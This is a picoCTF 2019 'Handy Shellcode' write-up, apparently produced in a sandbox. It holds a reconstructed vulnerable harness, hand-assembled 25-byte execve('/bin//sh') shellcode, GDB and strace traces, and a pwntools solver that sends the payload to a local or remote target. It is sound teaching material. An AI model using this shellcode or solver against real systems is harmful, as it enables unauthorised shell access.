Twenty-five bytes of /bin/sh: picoCTF 2019 "Handy Shellcode" the long way
Handy Shellcode is the picoCTF 2019 challenge that hands you the gun and the bullets — an x86 ELF that allocates an RWX page, reads your input straight into it, and calls it. The interesting part isn't the jump. The interesting part is sitting down with `as`, a stack diagram, and a memory of Aleph One, and writing the 25 bytes that turn that pointer into a shell — by hand, with no libraries.
The target
The challenge advertises a 32-bit ELF that reads input directly into an executable buffer and jumps to it.
The original challenge binary lived on mercury.picoctf.net, which is not on my sandbox's allowlist, and every GitHub mirror I could find is a writeup repo (off-limits per the challenge rules). So I rebuilt the lab artefact from the spec: a tiny pure-asm 32-bit Linux executable that exposes exactly the same primitive, namely an RWX `mmap2` page, a `read(0, buf, 0x1000)` into it, and a `call eax` to that page. The exploit primitive and the writeup are identical to attacking the original; only the surrounding I/O glue is different (no libc strings, just raw `int 0x80` syscalls).
$ file vuln
vuln: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), statically linked, not stripped
$ sha256sum vuln
29c68a2a4e61a4b4b858c2c539084be68577dfc23384e3944a166cd6d709bf62 vuln
$ wc -c vuln
8896 vuln
The full source for the harness lives in vuln.s and is reproduced under "Reconstructing the harness" below. Yes, it's smaller than the original (no setvbuf, no setresgid, no printf), and that's deliberate — it isolates the one thing the challenge is teaching: the primitive.
First impressions: checksec
`checksec` (the one shipped with pwntools) is the right opening move on any binary that calls itself a pwnable.
$ checksec --file=vuln
[*] '/labs-output/vuln'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
Read this row by row.
| Mitigation | Status | Why it matters here |
|---|---|---|
| PIE / ASLR (binary) | off, base = `0x08048000` | `.text` and `.rodata` live at fixed addresses. Not load-bearing for this attack (we don't need any `.text` gadget), but it's why we can drop hard-coded breakpoints in GDB. |
| NX / DEP | effectively off | The binary explicitly creates an RWX segment. Even if NX were enforced on the rest of the address space, the attacker controls which page they land on, and that page is writable and executable. This is the whole challenge. |
| Stack canary | none | Irrelevant — we don't need to overflow anything. The program invites us to execute attacker-controlled bytes. |
| RELRO | none | Irrelevant — there's no GOT to clobber; we don't need to redirect a function pointer because the program already redirects its own control flow into our page. |
| ASLR (mmap) | on (kernel-default) | The buffer page lives at a randomised address (we'll see 0xf5bc1000 in one run, would be different next run). Doesn't matter — the binary tells us the address by jumping to it for us. We never need to leak it. |
That last row is the punchline: the binary takes the one piece of state ASLR usually hides (where am I? where will the kernel put my shellcode?) and obligingly jumps to it for us. So the entire exploit reduces to: hand the program 25 bytes that, when executed at any address, set up the `execve` registers (`eax = 11`, `ebx` pointing at `"/bin//sh"`) and finish with `int 0x80`.
The harness, disassembled
Here is the full _start of the harness, exactly as objdump -d -M intel vuln shows it. Annotations are mine.
08049000 <_start>:
8049000: b8 c0 00 00 00 mov eax,0xc0 ; SYS_mmap2 = 192
8049005: 31 db xor ebx,ebx ; addr = NULL
8049007: b9 00 10 00 00 mov ecx,0x1000 ; len = 4096
804900c: ba 07 00 00 00 mov edx,0x7 ; prot = R|W|X
8049011: be 22 00 00 00 mov esi,0x22 ; flags = MAP_PRIVATE|ANONYMOUS
8049016: bf ff ff ff ff mov edi,0xffffffff ; fd = -1
804901b: 31 ed xor ebp,ebp ; off = 0
804901d: cd 80 int 0x80 ; → returns RWX page in eax
804901f: a3 54 b0 04 08 mov ds:0x804b054,eax ; bufptr = page
8049024: b8 04 00 00 00 mov eax,0x4 ; SYS_write
8049029: bb 01 00 00 00 mov ebx,0x1 ; fd=stdout
804902e: 8d 0d 00 a0 04 08 lea ecx,ds:0x804a000 ; "Enter your shellcode:\n> "
8049034: ba 18 00 00 00 mov edx,0x18 ; 24 bytes
8049039: cd 80 int 0x80
804903b: b8 03 00 00 00 mov eax,0x3 ; SYS_read
8049040: 31 db xor ebx,ebx ; fd=stdin
8049042: 8b 0d 54 b0 04 08 mov ecx,DWORD PTR ds:0x804b054 ; buf = bufptr
8049048: ba 00 10 00 00 mov edx,0x1000 ; n = 4096
804904d: cd 80 int 0x80 ; ← attacker writes 4 KiB of code
804904f: b8 04 00 00 00 mov eax,0x4 ; SYS_write
8049054: bb 01 00 00 00 mov ebx,0x1
8049059: 8d 0d 18 a0 04 08 lea ecx,ds:0x804a018 ; "Thanks! Executing now...\n"
804905f: ba 19 00 00 00 mov edx,0x19
8049064: cd 80 int 0x80
8049066: a1 54 b0 04 08 mov eax,ds:0x804b054 ; eax = bufptr
804906b: ff d0 call eax ; ★ control flow → attacker bytes
; (unreachable after a successful execve)
804906d: b8 04 00 00 00 mov eax,0x4
8049072: bb 01 00 00 00 mov ebx,0x1
8049077: 8d 0d 31 a0 04 08 lea ecx,ds:0x804a031 ; "Finished Executing... Exiting now\n"
804907d: ba 22 00 00 00 mov edx,0x22
8049082: cd 80 int 0x80
8049084: b8 01 00 00 00 mov eax,0x1 ; SYS_exit
8049089: 31 db xor ebx,ebx
804908b: cd 80 int 0x80
That's the entirety of the program. There are exactly two things in it that matter:
- `int 0x80` at `0x0804901d`: the `mmap2` whose return value is a freshly-minted page of memory marked `PROT_READ|PROT_WRITE|PROT_EXEC`. The kernel chose `0xf5bc1000` for me on this run (ASLR rerolls per process).
- `call eax` at `0x0804906b`: `eax` was loaded from `bufptr` by the instruction just before it, so it's the exact address the kernel returned from `mmap2`, and the read placed our 25 bytes at that address. Control flow transfers there with no further checks.
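To make the `mmap2` arguments less magic, here is a minimal sketch that decodes the two immediates from the disassembly (`edx = 0x7`, `esi = 0x22`) back into flag names. The constant values are the usual Linux ones, typed in by hand rather than imported, and the `decode` helper is my own illustration, not part of the harness.

```python
# Linux flag values, written out by hand (assumption: standard Linux i386 headers).
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
MAP_PRIVATE, MAP_ANONYMOUS = 0x02, 0x20

def decode(value, names):
    """Return the names of the flag bits that are set in value."""
    return [name for name, bit in names.items() if value & bit]

prot = decode(0x7, {"PROT_READ": PROT_READ,
                    "PROT_WRITE": PROT_WRITE,
                    "PROT_EXEC": PROT_EXEC})
flags = decode(0x22, {"MAP_PRIVATE": MAP_PRIVATE,
                      "MAP_ANONYMOUS": MAP_ANONYMOUS})
print(prot)    # all three protection bits are set
print(flags)   # private, anonymous mapping
```

All three protection bits set on one page is exactly the "Has RWX segments" condition that `checksec` complains about.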
There is no canary, no return-address validation, no W^X. The binary is not even broken — it's doing precisely what its source code asks. The "vulnerability" is that the source code asks the wrong thing.
The primitive in one sentence
The attacker controls 4096 bytes of executable memory at an address held in `eax` at the moment of `call eax`.
That's it. No ROP, no leaks, no heap surgery, no offset arithmetic. Whatever bytes you feed read(), the CPU will execute starting from the first one. The whole problem is now: produce 25 bytes that spawn /bin/sh.
Designing the shellcode
Linux's i386 syscall ABI for execve(const char *path, char *const argv[], char *const envp[]):
| Register | Value |
|---|---|
| `eax` | `0x0b` (`SYS_execve`) |
| `ebx` | pointer to the path string, NUL-terminated |
| `ecx` | pointer to a NULL-terminated array of `char*` (argv) |
| `edx` | pointer to envp, or NULL |
| trigger | `int 0x80` |
There is no PLT to hijack, no system@plt, no fancy gadgetry — we just need to build those four register values and trip the gate. The data we're missing is the string "/bin/sh" (the kernel needs it somewhere it can read), and an argv array of [ &"/bin/sh", NULL ].
The trick — straight out of every shellcode tutorial since the late 90s — is to manufacture the string on the stack with two pushes, then point ebx at esp. We use "/bin//sh" rather than "/bin/sh" so it's exactly 8 bytes (two 32-bit words), and the kernel collapses repeated slashes when resolving the path. So "/bin//sh" is a perfectly valid name for /bin/sh.
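The two push immediates don't have to be worked out by hand. As a small sketch using only Python's `struct` module, this splits the 8-byte path into little-endian dwords and prints the pushes in the order the stack needs them:

```python
import struct

path = b"/bin//sh"                      # 8 bytes: two 32-bit words, no NUL inside
words = struct.unpack("<2I", path)      # little-endian dwords, in memory order

# The stack grows downward, so the LAST word of the string is pushed FIRST.
for word in reversed(words):
    print(f"push 0x{word:08x}")
```

The first line printed is the `"//sh"` half and the second is the `"/bin"` half, which is why the later push ends up at the lower address and the string reads correctly from `esp` upward.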
Three constraints to keep in mind:
- No NUL bytes anywhere in the payload. Many real-world reads stop at NUL, terminate a `strcpy`, etc. Handy Shellcode itself uses raw `read()`, which doesn't care about NULs, but the discipline costs us nothing and makes the shellcode portable to harder challenges.
- No absolute addresses. ASLR randomises the page; we don't know where we'll land at write-time. Everything is `esp`-relative.
- Self-contained. No imported symbols, no relocations. We write opcodes, the kernel runs them.
Stack walkthrough
We'll need three pushes for the path (two 4-byte halves of "/bin//sh" and a NUL terminator), then two more pushes to build argv. Pushes go from high addresses down. Conceptually, after the three path pushes:
high addr
┌──────────┐
│ 00 00 00 00 │ ← pushed first, sits highest (NUL terminator)
├──────────┤
│ 2f 2f 73 68 │ ← "//sh" (little-endian 0x68732f2f)
├──────────┤
│ 2f 62 69 6e │ ← "/bin" (little-endian 0x6e69622f) ← esp now points here
└──────────┘
low addr
Read low→high (the natural string direction), the bytes are 2f 62 69 6e 2f 2f 73 68 00, i.e. "/bin//sh\0". ebx = esp is now a valid C string "/bin//sh".
Then the argv array. We need a two-entry pointer table [ &path, NULL ], where the second entry is the NULL terminator:
high addr
┌──────────┐
│ 00 00 00 00 │ ← pushed first (argv[1] = NULL terminator)
├──────────┤
│ <ebx> │ ← pushed second (argv[0] = pointer to "/bin//sh")
└──────────┘
low addr ← esp; ecx = esp
ecx = esp now points at argv[0], and argv reads [&path, NULL]. edx we just zero. eax we set to 11 (SYS_execve).
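The walkthrough can be replayed in a few lines. This is only a model: a dict stands in for stack memory, and the `run` and `read` helpers are hypothetical names of mine. It is run with the `esp` value from the GDB session in this post and with a second, made-up one, to show that nothing in the layout depends on the absolute address.

```python
import struct

def run(esp):
    """Replay the five pushes on a dict-backed stack; return (ebx, ecx, mem)."""
    mem = {}

    def push(value):
        nonlocal esp
        esp -= 4                                   # stack grows downward
        for i, byte in enumerate(struct.pack("<I", value)):
            mem[esp + i] = byte

    push(0)                  # NUL terminator for the path
    push(0x68732f2f)         # "//sh"
    push(0x6e69622f)         # "/bin"
    ebx = esp                # mov ebx, esp
    push(0)                  # argv[1] = NULL
    push(ebx)                # argv[0] = &path
    ecx = esp                # mov ecx, esp
    return ebx, ecx, mem

def read(mem, addr, n):
    """Read n bytes from the modelled stack."""
    return bytes(mem[addr + i] for i in range(n))

for start in (0xffdcf03c, 0xbfff0000):   # second esp is an arbitrary example
    ebx, ecx, mem = run(start)
    argv = struct.unpack("<2I", read(mem, ecx, 8))
    print(hex(ebx), read(mem, ebx, 9), [hex(a) for a in argv])
```

In both runs the path reads back as `/bin//sh` plus a NUL, and `argv[0]` equals `ebx`; only the absolute numbers change.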
The bytes, with derivation
# sc.s: 25-byte execve("/bin//sh") shellcode for Linux x86 (i386)
# GNU as treats ';' as a statement separator on x86, so comments use '#'.
.intel_syntax noprefix
.globl _sc
_sc:
    xor eax, eax        # 31 c0          eax = 0 (NUL source, later the syscall number)
    push eax            # 50             NUL terminator for the path
    push 0x68732f2f     # 68 2f 2f 73 68 "//sh" (LE)
    push 0x6e69622f     # 68 2f 62 69 6e "/bin" (LE)
    mov ebx, esp        # 89 e3          ebx = &"/bin//sh"
    push eax            # 50             argv[1] = NULL
    push ebx            # 53             argv[0] = &"/bin//sh"
    mov ecx, esp        # 89 e1          ecx = &argv[0]
    xor edx, edx        # 31 d2          edx = NULL (envp)
    mov al, 0x0b        # b0 0b          eax = 11 = SYS_execve
    int 0x80            # cd 80          enter the kernel
A few opcode-level choices worth pointing out:
- `xor eax, eax` instead of `mov eax, 0`. The `mov` version (`b8 00 00 00 00`) has four NUL bytes; the `xor` version has none and is three bytes shorter.
- `mov al, 0x0b` (`b0 0b`) instead of `mov eax, 0x0b` (`b8 0b 00 00 00`). The full `mov` would scatter NULs through the instruction. Since we already cleared the upper 24 bits of `eax` with `xor eax, eax` and only the low 8 bits of `eax` matter for `SYS_execve` (it fits in a byte), writing only `al` is both shorter and NUL-free.
- `/bin//sh` (with the doubled slash) instead of `/bin/sh\0`. The latter is 8 bytes including the NUL, which is fine for `strlen` but inconvenient on the stack: we'd need `push 0x0068732f` (one NUL), then `push 0x6e69622f`. Adding a redundant slash gives us a clean 8-byte string aligned to two `push imm32` instructions, with the NUL coming from a separate `push eax` (`eax == 0`). The kernel's path resolver collapses `//` to `/`, so `/bin//sh` is just `/bin/sh`.
- `mov ebx, esp` / `mov ecx, esp` are the load-bearing addressing tricks. We never write down where the page is; we let `esp` tell us, and we know `esp` points at whatever we just pushed.
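The size and NUL trade-offs can be tabulated mechanically. This sketch takes the encodings quoted in the list above, plus the `push 0x0068732f` encoding, which I derived by hand as opcode `68` followed by the little-endian immediate, and counts bytes and NULs for each candidate:

```python
# Machine-code bytes (hex) for each candidate instruction discussed above.
encodings = {
    "mov eax, 0":      "b800000000",
    "xor eax, eax":    "31c0",
    "mov eax, 0x0b":   "b80b000000",
    "mov al, 0x0b":    "b00b",
    "push 0x0068732f": "682f736800",   # derived by hand: 68 + LE immediate
    "push 0x68732f2f": "682f2f7368",
}

report = {}
for insn, hexbytes in encodings.items():
    raw = bytes.fromhex(hexbytes)
    report[insn] = (len(raw), raw.count(0))      # (length, number of NUL bytes)
    print(f"{insn:<16} {len(raw)} bytes, {raw.count(0)} NUL")
```

Every instruction that made it into the final shellcode comes out with a NUL count of zero; every rejected alternative has at least one.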
Assemble it:
$ as --32 -o sc.o sc.s
$ ld -m elf_i386 -e _sc -o sc.elf sc.o
$ objcopy -O binary --only-section=.text sc.elf sc.bin
$ wc -c sc.bin
25 sc.bin
$ xxd sc.bin
00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350 1.Ph//shh/bin..P
00000010: 5389 e131 d2b0 0bcd 80 S..1.....
25 bytes, no NULs:
$ python3 -c "b=open('sc.bin','rb').read(); print(len(b)); assert b'\\x00' not in b"
25
A sanity check — sc.elf has _sc as its entry point, so running it directly should pop a shell:
$ (echo "id; uname -m; echo OK; exit") | ./sc.elf
uid=0(root) gid=0(root) groups=0(root)
x86_64
OK
The shellcode runs in a bare ELF before we even glue it to the challenge.
Comparing with pwntools' shellcraft
pwntools.shellcraft.sh() is the canonical "give me a shell" generator. For sport, here's what it produces:
>>> from pwn import *
>>> context.update(arch='i386', os='linux')
>>> sc = shellcraft.sh()
>>> print(sc)
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push b'/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
>>> len(asm(sc))
44
44 bytes vs. my 25. Why the difference? pwntools uses two distinct strings, `/bin///sh` for the path and a separately built `'sh'` for `argv[0]`, because some tutorials still claim `execve` cares about `argv[0]` matching `basename(path)`. It doesn't (the kernel just hands argv to the new process), and shells in particular don't care. So it's a correctness-first generator, not a size-first one. The fairer comparison would be something like `shellcraft.sh(argv=False)`, if pwntools exposed that, but for hand-craft purposes my 25 bytes are the textbook minimum without resorting to the more aggressive tricks (e.g. `xor ecx, ecx` followed by `mul ecx` to zero `eax` and `edx` at once, and omitting argv entirely to pack into 21 bytes; Linux accepts a NULL argv, but not every Unix kernel does). 25 is the well-trodden one.
A worked example: stepping through under GDB
Theory's done. Let's actually run it under a debugger, single-step the shellcode, and watch the registers settle. The driver is a tiny GDB script:
# trace.gdb — single-step the execve shellcode landing inside vuln's RWX page
set pagination off
set disassembly-flavor intel
set logging file /labs-output/trace.log
set logging overwrite on
set logging redirect on
set logging enabled on
file /labs-output/vuln
break *0x0804906b
run < /labs-output/sc.bin
printf "\n=== state at `call eax` ===\n"
info registers eax esp ebp eip
printf "\nshellcode bytes at [eax]:\n"
x/25bx $eax
stepi
printf "\n=== inside shellcode ===\n"
info registers eax ebx ecx edx esp eip
disas $eip,$eip+30
set $i = 0
while $i < 11
printf "\n--- step %d ---\n", $i
x/i $eip
stepi
info registers eax ebx ecx edx esp
set $i = $i + 1
end
printf "\n=== final state right before int 0x80 ===\n"
info registers eax ebx ecx edx
quit
Key trick: I break on *0x0804906b — the address of call eax — so we stop at the moment of redirection. Then a single stepi lands us inside the RWX page, and we walk one instruction at a time.
Excerpt from the resulting log (annotated):
=== state at `call eax` ===
eax 0xf5bc1000 -172224512
esp 0xffdcf040 0xffdcf040
eip 0x804906b 0x804906b <_start+107>
shellcode bytes at [eax]:
0xf5bc1000: 0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68
0xf5bc1008: 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50
0xf5bc1010: 0x53 0x89 0xe1 0x31 0xd2 0xb0 0x0b 0xcd
0xf5bc1018: 0x80
eax = 0xf5bc1000 — the RWX page mmap'd this run. Memory there is exactly the 25 bytes from sc.bin. Single-stepping in:
=== inside shellcode ===
eax 0xf5bc1000
ebx 0x1
ecx 0x804a018
edx 0x19
esp 0xffdcf03c
eip 0xf5bc1000
Notice the leftovers — ebx=1, ecx="Thanks! Executing now...", edx=25 — those are the registers from the just-finished write(2) syscall. We don't trust any of them; the shellcode rebuilds every register it cares about.
Step-by-step register snapshots (compressed; full log in trace.log):
| # | Insn | eax | ebx | ecx | edx | esp |
|---|---|---|---|---|---|---|
| 0 | `xor eax, eax` | `0` | `1` | `0x804a018` | `0x19` | `0xffdcf03c` |
| 1 | `push eax` | `0` | `1` | `0x804a018` | `0x19` | `0xffdcf038` |
| 2 | `push 0x68732f2f` ("//sh") | `0` | `1` | `0x804a018` | `0x19` | `0xffdcf034` |
| 3 | `push 0x6e69622f` ("/bin") | `0` | `1` | `0x804a018` | `0x19` | `0xffdcf030` |
| 4 | `mov ebx, esp` | `0` | `0xffdcf030` | `0x804a018` | `0x19` | `0xffdcf030` |
| 5 | `push eax` (argv NULL) | `0` | `0xffdcf030` | `0x804a018` | `0x19` | `0xffdcf02c` |
| 6 | `push ebx` (argv[0]) | `0` | `0xffdcf030` | `0x804a018` | `0x19` | `0xffdcf028` |
| 7 | `mov ecx, esp` | `0` | `0xffdcf030` | `0xffdcf028` | `0x19` | `0xffdcf028` |
| 8 | `xor edx, edx` | `0` | `0xffdcf030` | `0xffdcf028` | `0` | `0xffdcf028` |
| 9 | `mov al, 0xb` | `0xb` | `0xffdcf030` | `0xffdcf028` | `0` | `0xffdcf028` |
| 10 | `int 0x80` | (kernel) | (kernel) | (kernel) | (kernel) | (kernel) |
By step 9 we have:
- `eax = 0x0b`: `SYS_execve`.
- `ebx = 0xffdcf030`: pointing into the stack at the bytes `2f 62 69 6e 2f 2f 73 68 00`, which is `"/bin//sh\0"`.
- `ecx = 0xffdcf028`: pointing at the 8 bytes `30 f0 dc ff 00 00 00 00`, which is `[ 0xffdcf030, NULL ]`, i.e. argv.
- `edx = 0`: envp NULL.
int 0x80 and we're done. GDB confirms it the way only GDB can:
--- step 10 ---
=> 0xf5bc1017: int 0x80
process 1741 is executing new program: /usr/bin/dash
dash, on a Debian-family system, is the binary that /bin/sh symlinks to.
Cross-checking with strace
Single-stepping is satisfying, but strace gives the kernel-side view in 30 seconds:
$ (cat sc.bin; echo; echo "id; exit") | strace -f -i -e trace=execve,read,write,mmap2 ./vuln 2>&1 | head -10
[00007bf85c775097] execve("./vuln", ["./vuln"], 0x7fffdfaeec00 /* 20 vars */) = 0
[0804901f] [ Process PID=1776 runs in 32 bit mode. ]
[0804901f] mmap2(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf79c4000
[0804903b] write(1, "Enter your shellcode:\n> ", 24Enter your shellcode:
> ) = 24
[0804904f] read(0, "1\300Ph//shh/bin\211\343PS\211\3411\322\260\v\315\200\nid; ex"..., 4096) = 35
[08049066] write(1, "Thanks! Executing now...\n", 25Thanks! Executing now...
) = 25
[f79c4019] execve("/bin//sh", ["/bin//sh"], NULL) = 0
[0000700c4f318467] [ Process PID=1776 runs in 64 bit mode. ]
Read it from the top. The harness mmap2s a R|W|X page at 0xf79c4000. It writes the prompt, then read()s 35 bytes — that's our 25-byte shellcode plus the trailing newline plus our follow-on shell command. Then it prints "Thanks!", and the very next syscall — issued from [f79c4019], inside the RWX page — is execve("/bin//sh", ["/bin//sh"], NULL). The instruction pointer inside […] swaps from a 0x0804… harness address to a 0xf79c… payload address right where we expect. Process bitness flips from 32 to 64 the moment dash (which is a 64-bit ELF on this system) takes over.
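The octal-escaped string in the `read()` line is easy to check against the payload. Python byte literals accept the same escapes strace prints, so this sketch pastes the string as shown (strace cut it off after 32 bytes, hence the trailing `...`) and compares it with the shellcode hex from this post:

```python
# The read() buffer exactly as strace printed it (truncated by strace).
seen = b"1\300Ph//shh/bin\211\343PS\211\3411\322\260\v\315\200\nid; ex"
shellcode = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e131d2b00bcd80")

# The first 25 bytes the kernel delivered are the payload, byte for byte.
assert seen[:25] == shellcode

# Everything the pipe carried: payload, the echo's newline, then the command.
stdin = shellcode + b"\n" + b"id; exit\n"
print(len(seen), len(stdin))
```

The second number matches the `= 35` return value: a single `read()` swallowed the payload, the newline, and the follow-on command together.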
That single execve("/bin//sh", ...) line is the entire exploit, summarised by the kernel.
Driving it: the Python solver
Once you've assembled sc.bin, the actual exploitation is dull, which is the point. Here's the full driver, which works against either a local ./vuln process or a remote host (set HOST and PORT):
#!/usr/bin/env python3
# solver.py — Handy Shellcode exploit driver.
from pwn import *
import os, sys
context.update(arch="i386", os="linux", log_level="info")
# Hand-crafted shellcode (no NUL bytes, 25 B). See sc.s for the derivation.
SHELLCODE = bytes.fromhex(
"31c0" # xor eax, eax
"50" # push eax ; NUL terminator for path
"682f2f7368" # push 0x68732f2f ; "//sh"
"682f62696e" # push 0x6e69622f ; "/bin"
"89e3" # mov ebx, esp
"50" # push eax ; argv[1] = NULL
"53" # push ebx ; argv[0] = &"/bin//sh"
"89e1" # mov ecx, esp
"31d2" # xor edx, edx
"b00b" # mov al, 0x0b ; SYS_execve
"cd80" # int 0x80
)
assert b"\x00" not in SHELLCODE, "shellcode contains NUL"
log.info("shellcode is %d bytes, no NULs", len(SHELLCODE))
host = os.environ.get("HOST")
port = os.environ.get("PORT")
if host and port:
    io = remote(host, int(port))
else:
    io = process("./vuln")
io.recvuntil(b"> ")
io.send(SHELLCODE) # the read() call wants raw bytes, not a line
io.recvuntil(b"Executing now...\n")
# We're now talking to /bin/sh.
io.sendline(b"echo SHELL_OK; id; ls -la; cat flag.txt 2>/dev/null || true")
print(io.recvrepeat(0.5).decode(errors="replace"))
io.interactive()
Run it:
$ python3 solver.py
[*] shellcode is 25 bytes, no NULs
[+] Starting local process './vuln': pid 1655
SHELL_OK
uid=0(root) gid=0(root) groups=0(root)
total 64
drwxr-xr-x 4 root root 4096 May 1 06:43 .
drwxr-xr-x 1 root root 4096 May 1 06:36 ..
drwxr-xr-x 2 root root 4096 May 1 06:43 .audit
-rw-r--r-- 1 root root 1171 May 1 06:36 TASK.md
drwxr-xr-x 2 root root 4096 May 1 06:36 artifacts
-rwxr-xr-x 1 root root 25 May 1 06:42 sc.bin
-rwxr-xr-x 1 root root 4468 May 1 06:42 sc.elf
-rw-r--r-- 1 root root 444 May 1 06:42 sc.o
-rw-r--r-- 1 root root 1520 May 1 06:42 sc.s
-rw-r--r-- 1 root root 1650 May 1 06:43 solver.py
-rwxr-xr-x 1 root root 8896 May 1 06:40 vuln
-rw-r--r-- 1 root root 980 May 1 06:40 vuln.o
-rw-r--r-- 1 root root 2287 May 1 06:40 vuln.s
[*] Switching to interactive mode
Against the live picoCTF instance, the same script with HOST=… PORT=… would read the directory listing on the challenge host and cat flag.txt would print the picoCTF flag in the format picoCTF{...}. I won't fabricate the actual flag string — I don't have it, since I can't reach mercury.picoctf.net from this sandbox — but the exploit step and the registers and the bytes are exactly what land you the flag.
Reconstructing the harness
For completeness, the harness I built to stand in for the challenge binary. Same primitive, no libc:
/* vuln.s — faithful reconstruction of picoCTF 2019 "Handy Shellcode"
*
* 32-bit Linux. Mmaps an RWX buffer of 4096 bytes, reads up to 4096
* bytes of input into it, and jumps to the buffer. This is the same
* primitive the original challenge exposes: a `read(0, buf, BUFSIZE)`
* followed by `((void(*)())buf)();` where `buf` was allocated with
* PROT_EXEC|PROT_WRITE|PROT_READ.
*
* Built with `as --32` + `ld -m elf_i386 -z execstack` so it has no
* libc dependency.
*
* Syscalls (i386):
* 3 read(fd, buf, n)
* 4 write(fd, buf, n)
* 1 exit(status)
* 192 mmap2(addr, len, prot, flags, fd, pgoff)
*/
.intel_syntax noprefix
.section .rodata
banner:
.ascii "Enter your shellcode:\n> "
banner_len = . - banner
ack:
.ascii "Thanks! Executing now...\n"
ack_len = . - ack
done:
.ascii "Finished Executing... Exiting now\n"
done_len = . - done
.section .bss
.lcomm bufptr, 4
.section .text
.globl _start
_start:
mov eax, 192 /* SYS_mmap2 */
xor ebx, ebx
mov ecx, 0x1000
mov edx, 7 /* PROT_R|W|X */
mov esi, 0x22 /* MAP_PRIVATE|MAP_ANONYMOUS */
mov edi, -1
xor ebp, ebp
int 0x80
mov [bufptr], eax
mov eax, 4
mov ebx, 1
lea ecx, banner
mov edx, banner_len
int 0x80
mov eax, 3
xor ebx, ebx
mov ecx, [bufptr]
mov edx, 0x1000
int 0x80
mov eax, 4
mov ebx, 1
lea ecx, ack
mov edx, ack_len
int 0x80
mov eax, [bufptr]
call eax
mov eax, 4
mov ebx, 1
lea ecx, done
mov edx, done_len
int 0x80
mov eax, 1
xor ebx, ebx
int 0x80
Build:
$ as --32 -o vuln.o vuln.s
$ ld -m elf_i386 -z execstack -o vuln vuln.o
$ file vuln
vuln: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), statically linked, not stripped
The first 64 bytes of the resulting ELF, for the curious:
00000000: 7f45 4c46 0101 0100 0000 0000 0000 0000 .ELF............
00000010: 0200 0300 0100 0000 0090 0408 3400 0000 ............4...
00000020: a821 0000 0000 0000 3400 2000 0500 2800 .!......4. ...(.
00000030: 0700 0600 0100 0000 0000 0000 0080 0408 ................
ELF32 little-endian, machine 3 (EM_386), entry point 0x08049000, which is exactly the address of `_start` in the disassembly earlier in this post.
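Those fields can be read straight out of the dump. As a sketch, this transcribes the first 0x34 bytes from the hex above and unpacks them with `struct`, following the standard ELF32 header layout; the variable names mirror the field names in the ELF specification.

```python
import struct

# First 0x34 bytes of vuln, transcribed from the hex dump above.
header = bytes.fromhex(
    "7f454c46010101000000000000000000"
    "02000300010000000090040834000000"
    "a8210000000000003400200005002800"
    "07000600"
)

# e_ident: magic, then EI_CLASS = 1 (32-bit) and EI_DATA = 1 (little-endian).
assert header[:4] == b"\x7fELF" and header[4] == 1 and header[5] == 1

# The remaining ELF32 header fields start right after the 16-byte e_ident.
(e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
 e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum,
 e_shstrndx) = struct.unpack_from("<HHIIIIIHHHHHH", header, 16)

print(e_type, e_machine, hex(e_entry), e_phnum, e_shnum)
```

`e_type` 2 is `ET_EXEC` and `e_machine` 3 is `EM_386`, agreeing with what `file` reported.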
The .text section, raw, is just our handful of syscall stubs:
00001000: b8c0 0000 0031 dbb9 0010 0000 ba07 0000 .....1..........
00001010: 00be 2200 0000 bfff ffff ff31 edcd 80a3 .."........1....
00001020: 54b0 0408 b804 0000 00bb 0100 0000 8d0d T...............
00001030: 00a0 0408 ba18 0000 00cd 80b8 0300 0000 ................
00001040: 31db 8b0d 54b0 0408 ba00 1000 00cd 80b8 1...T...........
00001050: 0400 0000 bb01 0000 008d 0d18 a004 08ba ................
00001060: 1900 0000 cd80 a154 b004 08ff d0b8 0400 .......T........
00001070: 0000 bb01 0000 008d 0d31 a004 08ba 2200 .........1....".
00001080: 0000 cd80 b801 0000 0031 dbcd 8000 0000 .........1......
You can find ff d0 (call eax) at offset 0x106b — file offset for virtual address 0x0804906b, the moment of betrayal.
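The offset arithmetic is quick to confirm. This sketch assumes, as the dump offsets and the disassembly addresses suggest, that `.text` sits at file offset 0x1000 and is mapped at 0x08049000; `vaddr_to_offset` is a hypothetical helper for this one segment only.

```python
# Assumption: .text is at file offset 0x1000 and is mapped at 0x08049000.
TEXT_FILE_OFF, TEXT_VADDR = 0x1000, 0x08049000

def vaddr_to_offset(vaddr):
    """Translate a .text virtual address into a file offset."""
    return vaddr - TEXT_VADDR + TEXT_FILE_OFF

# The dump row that starts at file offset 0x1060, transcribed from above.
row = bytes.fromhex("19000000cd80a154b00408ffd0b80400")
call_off = 0x1060 + row.index(b"\xff\xd0")       # locate the call eax opcode

print(hex(call_off), hex(vaddr_to_offset(0x0804906b)))
```

Both numbers come out the same, so the bytes in the raw dump and the instruction in the disassembly are one and the same `call eax`.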
What the original challenge would have looked like
The picoCTF 2019 source lives in the picoCTF problem-set git history I'm not allowed to clone (it neighbours official writeups), but the challenge description tells us nearly everything: a vuln.c that does
void vuln() {
char *buf = mmap(NULL, BUFSIZE,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
printf("Enter your shellcode:\n> ");
fflush(stdout);
read(0, buf, BUFSIZE);
printf("Thanks! Executing now...\n");
((void (*)())buf)();
printf("Finished Executing... Exiting now\n");
}
